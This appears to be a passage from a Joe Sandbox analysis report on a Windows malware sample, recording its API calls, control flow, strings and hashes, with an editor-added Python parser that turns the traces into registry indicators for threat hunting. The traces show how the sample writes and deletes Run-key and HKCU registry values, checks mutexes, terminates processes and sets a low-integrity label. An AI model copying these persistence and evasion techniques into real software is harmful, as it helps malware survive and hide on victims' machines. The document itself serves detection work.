                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D4490
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007D44A4
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D4414
                                                                            • SOFTWARE\%s, xrefs: 007D4419
                                                                            • {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007D4473
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                             • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close$FileModuleNameOpenValue__snwprintf_memsetlstrlen
                                                                            • String ID: SOFTWARE\%s${73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 1214033602-923683513
                                                                            • Opcode ID: 02a83ecdc4334e991a2618d8e96c67340de0c7b721d04e096a3ec4cb17e34d45
                                                                            • Instruction ID: eecdfb9bb3b766ba20066ead2baeb1f4583e0084445389aee62f507621ae77a0
                                                                            • Opcode Fuzzy Hash: 02a83ecdc4334e991a2618d8e96c67340de0c7b721d04e096a3ec4cb17e34d45
                                                                            • Instruction Fuzzy Hash: 64119FB5A50314BBD724DB60DC4EFE6737CEB44B00F004698B619E6191EAB49AC4CB61
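The two registry-writing functions above (007D42A0 and 007D43D0) and the Run-key cleanup at 007D2680 whose record follows are more useful as hunt material once the raw trace is decoded: the hKey 80000001 passed to RegOpenKeyExW is HKEY_CURRENT_USER, samDesired 00000102 is KEY_SET_VALUE | KEY_WOW64_64KEY, dwType 00000003 at 007D4381 is REG_BINARY and dwType 00000001 at 007D447F is REG_SZ, and the '?' subkey is the string __snwprintf builds from 'SOFTWARE\%s' and the GUID referenced just before it. The Python below is added by the editor and is not part of the Joe Sandbox report or of the sample; it parses trace lines in the report's "• Api.MODULE(args), ref: ADDR" shape, decodes those constants, fills the formatted subkey, and emits the registry artifacts as full paths. The sample lines are constructed to match the records on this page, the rule that a format string consumes the plain strings referenced immediately before it is a heuristic, and all function and field names are the editor's own.

```python
import re
from collections import namedtuple
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample (editor's own, shaped like the report's trace and Strings lines):
# the HKCU SOFTWARE\{GUID} value write at 007D43D0, then the Run-key deletion at 007D2680.
SAMPLE_TRACE = """\
• __snwprintf.LIBCMT ref: 007D442A
• RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00000102,?), ref: 007D444C
• RegSetValueExW.KERNELBASE(?,{73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8},00000000,00000001,?,00000002), ref: 007D447F
• RegCloseKey.ADVAPI32(?), ref: 007D4490
• RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,?), ref: 007D26D5
• RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,007C1109), ref: 007D26E8
• RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26F2
"""
SAMPLE_STRINGS = """\
• {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D4414
• SOFTWARE\\%s, xrefs: 007D4419
• {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8}, xrefs: 007D4473
"""
# Documented winreg.h constants; the trace shows them only as raw hex words.
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD"}
KEY_RIGHTS = [(0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
              (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x100, "KEY_WOW64_64KEY")]
# "• Api.MODULE(args), ref: ADDR" or "• Api.MODULE ref: ADDR"; "Part of subcall" lines do not match.
TRACE_RE = re.compile(r"•\s*(?P<api>\S+?)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)")
STRING_RE = re.compile(r"•\s*(?P<s>.*?),\s+xrefs:\s+(?P<ref>[0-9A-Fa-f]+)")
ApiCall = namedtuple("ApiCall", "api module args ref")

@dataclass
class RegistryArtifact:
    op: str                    # "set" or "delete"
    root: str
    subkey: str
    value_name: str
    value_type: Optional[str]  # decoded dwType for "set", None for "delete"
    rights: List[str]          # decoded samDesired of the RegOpenKeyExW that opened the key

def hexarg(a: str) -> Optional[int]:
    try:                       # trace arguments are hex words; '?' or symbolic text yields None
        return int(a, 16)
    except ValueError:
        return None

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = TRACE_RE.search(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

def resolve_format_strings(text: str) -> List[str]:
    """Heuristic: a format with n '%s' consumes the n plain strings referenced just before it."""
    refs = sorted((int(m.group("ref"), 16), m.group("s"))
                  for m in map(STRING_RE.search, text.splitlines()) if m)
    resolved, pending = [], []
    for _, s in refs:
        n = s.count("%s")
        if n == 0:
            pending.append(s)
            continue
        take = min(n, len(pending))
        args = [pending.pop() for _ in range(take)][::-1] + ["?"] * (n - take)
        for a in args:
            s = s.replace("%s", a, 1)
        resolved.append(s)
    return resolved

def extract_registry_artifacts(calls: List[ApiCall], formatted: List[str]) -> List[RegistryArtifact]:
    """State machine: RegOpenKey* selects the key, Set/DeleteValue record against it, RegCloseKey clears."""
    queue, current, found = list(formatted), None, []
    for c in calls:
        if c.api in ("RegOpenKeyW", "RegOpenKeyExW"):
            root = HKEY_ROOTS.get(hexarg(c.args[0]), c.args[0])
            subkey = c.args[1]
            if subkey == "?" and queue:   # built at runtime by __snwprintf: take the resolved format
                subkey = queue.pop(0)
            mask = hexarg(c.args[3]) if c.api == "RegOpenKeyExW" else None
            current = (root, subkey, [name for bit, name in KEY_RIGHTS if mask is not None and mask & bit])
        elif c.api == "RegSetValueExW" and current:
            vtype = REG_TYPES.get(hexarg(c.args[3]), c.args[3])
            found.append(RegistryArtifact("set", *current[:2], c.args[1], vtype, current[2]))
        elif c.api == "RegDeleteValueW" and current:
            found.append(RegistryArtifact("delete", *current[:2], c.args[1], None, current[2]))
        elif c.api == "RegCloseKey":
            current = None
    return found

if __name__ == "__main__":
    for a in extract_registry_artifacts(parse_trace(SAMPLE_TRACE), resolve_format_strings(SAMPLE_STRINGS)):
        print(f"{a.op:6} {a.root}\\{a.subkey}\\{a.value_name}", a.value_type or "", a.rights)
```

Run as a script it prints the HKCU key HKEY_CURRENT_USER\SOFTWARE\{DE7C4D5F-E773-43F0-B029-ED407FF538E8} with the {73B46CE5-4FE8-49BB-8E7E-72DC4082B4F8} REG_SZ value, and the HKLM Run value {AB1F3E47-AEF1-400E-A108-233A046C3A34} that the cleanup routine deletes; those are the paths to query on a suspect host. The value deleted from the HKCU Run key at 007D26AE appears in the trace only as a pointer (00836FC8), so its name cannot be recovered from this record, and the state machine deliberately records nothing for a RegSetValueExW or RegDeleteValueW that is not preceded by an open it can see.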

                                                                            Control-flow Graph (Executed / Not Executed)
                                                                            • 720: 7d2680-7d268b
                                                                            • 721: 7d268d-7d26a3 RegOpenKeyW
                                                                            • 722: 7d26be-7d26c5
                                                                            • 723: 7d26a5-7d26b8 RegDeleteValueW RegCloseKey
                                                                            • 724: 7d26f8-7d2700
                                                                            • 725: 7d26c7-7d26dd RegOpenKeyW
                                                                            • 726: 7d26df-7d26f2 RegDeleteValueW RegCloseKey
                                                                            • Edges: 720->721, 720->722, 721->722, 721->723, 723->722, 722->724, 722->725, 725->724, 725->726, 726->724
                                                                            APIs
                                                                            • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D269B
                                                                            • RegDeleteValueW.ADVAPI32(?,00836FC8,?,?,007C1109), ref: 007D26AE
                                                                            • RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26B8
                                                                            • RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D26D5
                                                                            • RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,007C1109), ref: 007D26E8
                                                                            • RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26F2
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D26CB
                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 007D26DF
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 007D2691
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                            • API String ID: 849931509-2070010218
                                                                            • Opcode ID: 8a198a08896e4b44a8d0a8a07fa227612586551d0f5edd24f83ab434990faac8
                                                                            • Instruction ID: 84b8f44a172d657fe68ad681c9f4e11b233ede66efa053f845b9a7df68751c5b
                                                                            • Opcode Fuzzy Hash: 8a198a08896e4b44a8d0a8a07fa227612586551d0f5edd24f83ab434990faac8
                                                                            • Instruction Fuzzy Hash: 45018679600308FBCB24DBA0FD59E69773CF794B01F104849FA05A1251DA79DA02AB65

                                                                            Control-flow Graph (Executed / Not Executed)
                                                                            • 742: 7cb510-7cb54f call 7e359a RegOpenKeyW
                                                                            • 745: 7cb555-7cb570 RegSetValueExW
                                                                            • 746: 7cb551-7cb553
                                                                            • 747: 7cb58f-7cb592
                                                                            • 748: 7cb580-7cb58a RegCloseKey
                                                                            • 749: 7cb572-7cb57e RegCloseKey
                                                                            • Edges: 742->745, 742->746, 745->748, 745->749, 746->747, 748->747, 749->747
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CB52F
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007CB547
                                                                            • RegSetValueExW.KERNELBASE(?,{BC63A593-23AA-4808-8FB5-F192F2F6D1F9},00000000,00000003,007D4285,0000000C), ref: 007CB568
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CB576
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CB519
                                                                            • SOFTWARE\%s, xrefs: 007CB51E
                                                                            • {BC63A593-23AA-4808-8FB5-F192F2F6D1F9}, xrefs: 007CB55F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenValue__snwprintf
                                                                            • String ID: SOFTWARE\%s${BC63A593-23AA-4808-8FB5-F192F2F6D1F9}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 2100281157-1712169463
                                                                            • Opcode ID: 6763e427b51dfbdd04c6063b0e87cdf83a46621a493ea6a9328e3c96245323c6
                                                                            • Instruction ID: 8210ace4eb853c8dca5c2291d8481ccb8f9beb5e13a3897eb44b3579304c2b1a
                                                                            • Opcode Fuzzy Hash: 6763e427b51dfbdd04c6063b0e87cdf83a46621a493ea6a9328e3c96245323c6
                                                                            • Instruction Fuzzy Hash: F5011275644308FBDB14DBB4ED8AFBA7368EB48B00F104D58B615A6280D6BADB1497A0

                                                                            Control-flow Graph (Executed / Not Executed), function 7c1900, blocks 7c18f4-7c1c4a; blocks with calls:
                                                                            • 755: 7c195d-7c1999 call 7d38d0
                                                                            • 756: 7c192a-7c195b call 7d0ca0
                                                                            • 777: 7c19c9-7c19dd WaitForSingleObject
                                                                            • 785: 7c19df-7c19fe OpenMutexW
                                                                            • 791: 7c1a00-7c1a13 WaitForSingleObject
                                                                            • 800: 7c1a2a-7c1a31 CloseHandle
                                                                            • 780: 7c1a47-7c1a5b WaitForSingleObject
                                                                            • 786: 7c1a5d-7c1a7c OpenMutexW
                                                                            • 793: 7c1a7e-7c1a92 WaitForSingleObject
                                                                            • 803: 7c1aa9-7c1ab0 CloseHandle
                                                                            • 790: 7c1ac6-7c1ada WaitForSingleObject
                                                                            • 797: 7c1adc-7c1afb OpenMutexW
                                                                            • 805: 7c1afd-7c1b11 WaitForSingleObject
                                                                            • 810: 7c1b28-7c1b2f CloseHandle
                                                                            • 771: 7c1b3f-7c1b90 WaitForMultipleObjects WaitForSingleObject
                                                                            • 781: 7c1ba4-7c1bad TerminateProcess
                                                                            • 787: 7c1bbc-7c1bc3 CloseHandle
                                                                            • 796: 7c1bd2-7c1bd9 CloseHandle
                                                                            • 795: 7c1bdf-7c1bfd call 7e3520 Sleep
                                                                            • 769: 7c1bff-7c1c04 Sleep
                                                                            • 759: 7c1c14-7c1c20 call 7cfac0
                                                                            • 767: 7c1c22-7c1c2b WaitForSingleObject
                                                                            • 766: 7c1c31-7c1c39 call 7dc1e0
                                                                            • 784: 7c1c3b-7c1c42 Wow64DisableWow64FsRedirection
                                                                            • 783: 7c1c48-7c1c4a ExitProcess
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 007C19D2
                                                                            • OpenMutexW.KERNEL32(00100000,00000000,{04D458D6-7C6C-445F-AEAD-313D698F1F0A}), ref: 007C19EB
                                                                            • WaitForSingleObject.KERNEL32(000002EC,0000000A), ref: 007C1A08
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Strings
                                                                            • {04D458D6-7C6C-445F-AEAD-313D698F1F0A}, xrefs: 007C19DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$Wow64$DisableExitMutexOpenProcessRedirection
                                                                            • String ID: {04D458D6-7C6C-445F-AEAD-313D698F1F0A}
                                                                            • API String ID: 3042449743-604615042
                                                                            • Opcode ID: 24ac5151c6ba6b8b7fe4961cfd428b763a1187ca2ad6a519c04e3d8ce8139798
                                                                            • Instruction ID: 4d40af70241b77c7febe8e055cca4196274e1e2ca3e0078a99e607a47ef60389
                                                                            • Opcode Fuzzy Hash: 24ac5151c6ba6b8b7fe4961cfd428b763a1187ca2ad6a519c04e3d8ce8139798
                                                                            • Instruction Fuzzy Hash: F1212CB0900118DBCB20DF54DD89F9C77BABBC6305F6089ADE249A6192CBB899C5CF11

                                                                            Control-flow Graph (Executed / Not Executed)
                                                                            • 811: 7dc570-7dc599 CreateFileW
                                                                            • 812: 7dc59b-7dc5ae GetFileSize
                                                                            • 813: 7dc614
                                                                            • 814: 7dc60a-7dc60e CloseHandle
                                                                            • 815: 7dc5b0-7dc5c3 LocalAlloc
                                                                            • 816: 7dc616-7dc619
                                                                            • 817: 7dc5c5-7dc5df ReadFile
                                                                            • 818: 7dc5e1-7dc5e7
                                                                            • 819: 7dc600-7dc604 LocalFree
                                                                            • 820: 7dc5e9-7dc5fe CloseHandle
                                                                            • Edges: 811->812, 811->813, 812->814, 812->815, 813->816, 814->813, 815->814, 815->817, 817->818, 817->819, 818->819, 818->820, 819->814, 820->816
                                                                            APIs
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,007D430B,?,00000000), ref: 007DC58C
                                                                            • GetFileSize.KERNEL32(000000FF,00000000,?,007D430B,?), ref: 007DC5A1
                                                                            • LocalAlloc.KERNELBASE(00000040,000000FF,?,007D430B), ref: 007DC5B6
                                                                            • ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 007DC5D7
                                                                            • CloseHandle.KERNELBASE(000000FF), ref: 007DC5ED
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC604
                                                                            • CloseHandle.KERNEL32(000000FF,?,007D430B), ref: 007DC60E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
                                                                            • String ID:
                                                                            • API String ID: 2550598358-0
                                                                            • Opcode ID: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction ID: 13bd648244198235f3a40f1d8640de305ae71bb9b799c6b9421bbf7a542ddc84
                                                                            • Opcode Fuzzy Hash: 523c218f5f5a70a9ef6a6c5723bd44c62c8d4a88217d473316d5653a66c79189
                                                                            • Instruction Fuzzy Hash: 56214D75A00208FBDB14DFA4CC88FAEB775FB48701F108545F615B72D0DA38AA41DB58

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 007DC4E6
                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007DC500
                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 007DC51C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC529
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                            • API String ID: 173816248-495562761
                                                                            • Opcode ID: a35943da90024b21e7100bc03df4350d0a54538a23dbeb4dbb9f4f898a4dd56a
                                                                            • Instruction ID: 803e055c32651640ad8c7d29b22b7ea696060e681f677748f855ba9d427a78d7
                                                                            • Opcode Fuzzy Hash: a35943da90024b21e7100bc03df4350d0a54538a23dbeb4dbb9f4f898a4dd56a
                                                                            • Instruction Fuzzy Hash: B8014CB1A00309ABEB14CF90DC55FAFB7B9AB44B00F104549F601AA2C0D7B5AA04CFA1

                                                                            Control-flow Graph (Executed / Not Executed)
                                                                            • 826: 7cb4a0-7cb4f3 call 7e359a RegGetValueW
                                                                            • 829: 7cb4fe
                                                                            • 830: 7cb4f5-7cb4fa
                                                                            • 831: 7cb500-7cb503
                                                                            • Edges: 826->829, 826->830, 829->831, 830->831
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007CB4BF
                                                                            • RegGetValueW.KERNELBASE(80000001,?,{BC63A593-23AA-4808-8FB5-F192F2F6D1F9},00000008,00000000,007D4257,0000000C), ref: 007CB4EB
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CB4A9
                                                                            • SOFTWARE\%s, xrefs: 007CB4AE
                                                                            • {BC63A593-23AA-4808-8FB5-F192F2F6D1F9}, xrefs: 007CB4DA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Value__snwprintf
                                                                            • String ID: SOFTWARE\%s${BC63A593-23AA-4808-8FB5-F192F2F6D1F9}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3635966236-1712169463
                                                                            • Opcode ID: fdace8a9778dfec436e3fcfeb7f20239f8de634f4ac773aecb0053ee6bd99a6e
                                                                            • Instruction ID: dbb84bf702d580e642a6be0f98cd9093cdebdf1e88ae91413bf468170db80ec6
                                                                            • Opcode Fuzzy Hash: fdace8a9778dfec436e3fcfeb7f20239f8de634f4ac773aecb0053ee6bd99a6e
                                                                            • Instruction Fuzzy Hash: E2F0A77164820CF6E710D6A49C4BFB67368E744700F1045587A04D62C0E6F99A1557D1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _malloc
                                                                            • String ID: LdrGetProcedureAddress
                                                                            • API String ID: 1579825452-3058439150
                                                                            APIs
                                                                            • LocalAlloc.KERNELBASE(00000040,00005004), ref: 007DCD2D
                                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 007DCD57
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD94
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DCD9E
                                                                            Similarity
                                                                            • API ID: Local$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2012307162-0
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C1C2B
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007C1C42
                                                                            • ExitProcess.KERNEL32 ref: 007C1C4A
                                                                            Similarity
                                                                            • API ID: Wow64$DisableExitObjectProcessRedirectionSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2411899824-0
                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 007C60F7
                                                                            • X64Call.FILE(B4411B10,00007FFD,00000004,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 007C6145
                                                                            Similarity
                                                                            • API ID: Call_strlen
                                                                            • String ID:
                                                                            • API String ID: 1092177880-0
                                                                            APIs
                                                                            Similarity
